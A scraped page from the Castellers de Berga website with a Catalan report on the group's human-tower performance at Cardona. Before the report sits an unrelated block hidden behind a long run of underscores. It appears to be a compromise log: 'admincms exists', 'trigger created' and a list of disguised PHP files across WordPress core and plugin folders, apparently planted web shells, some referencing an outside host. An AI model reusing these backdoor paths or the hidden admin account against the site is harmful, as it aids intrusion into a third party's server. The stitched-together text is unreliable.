Connected successfully https://castellersdeberga.cat admincms exists trigger created https://castellersdeberga.cat/wp-config-sample.php?ajax-response https://castellersdeberga.cat/wp-admin/includes/list-table-private-cron-private-meta-private-meta.php?varname=ofj.hu/ajax https://castellersdeberga.cat/wp-admin/media-meta-ajax-response-private-ajax-response.php?limit=ofj.hu/ajax https://castellersdeberga.cat/wp-admin/network/users-meta-ajax-response-core-core-private-cron-ajax-response.php https://castellersdeberga.cat/wp-content/plugins/LayerSlider/layerslider-stream-wp-ajax-response-meta-ajax-private-ajax-response.php https://castellersdeberga.cat/wp-content/plugins/event-tickets/event-tickets-private-stream-wp-stream.php https://castellersdeberga.cat/wp-includes/block-supports/spacing-meta-meta-meta.php https://castellersdeberga.cat/wp-includes/post-thumbnail-template-cron-cron-core-stream-private.php ________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________ Castellers de Berga | Camí dels 100, a Cardona
 

Camí dels 100, a Cardona


Camí dels 100, a CardonaDissabte 19 de setembre, vam actuar a Cardona dins els actes de l’Associació Cultural 18 de setembre, que commemora cada any la caiguda de Cardona sota les tropes borbòniques, el 1714. L’actuació va tenir lloc a l’arena de la Plaça de Bous de Cardona. Hi vam actuar acompanyats dels Salats de Súria i els Castellers de Cerdanyola.
Amb força públic a la graderia, hi vam descarregar el 3 de 7, el 4 de 6, el 3 de 6 amb agulla i el pilar de 5, a més de dos pilars de 4, un a l’inici i l’altre al final. El pilar de 5 va representar l’aleta número 250, sense comptar els pilars de 4. Els Castellers de Berga ja hem coronat 250 castells. I el 3 de 7 va ser l’aleta 94 de castells de 7 pisoso. Continuem cap el camí dels 100 castells de 7. Ens queden 4 actuacions aquesta temporada per aconseguir-ho.
Per la seva banda, els Salats de Súria van descarregar el 2, el 3 i el 4 de 6. Els Castellers de Cerdanyola es van anotar el 3 de 6 amb agulla, 3 de 7 i 4 de 7.
Continuem amb els assajos de dimarts i divendres a Cal Cuberas i el cap de setmana vinent descansem. Tornem a actuar el dissabte 3 d’octubre, a 2/4 de 7 serem a la Plaça del Forn en motiu de la Bergabolet.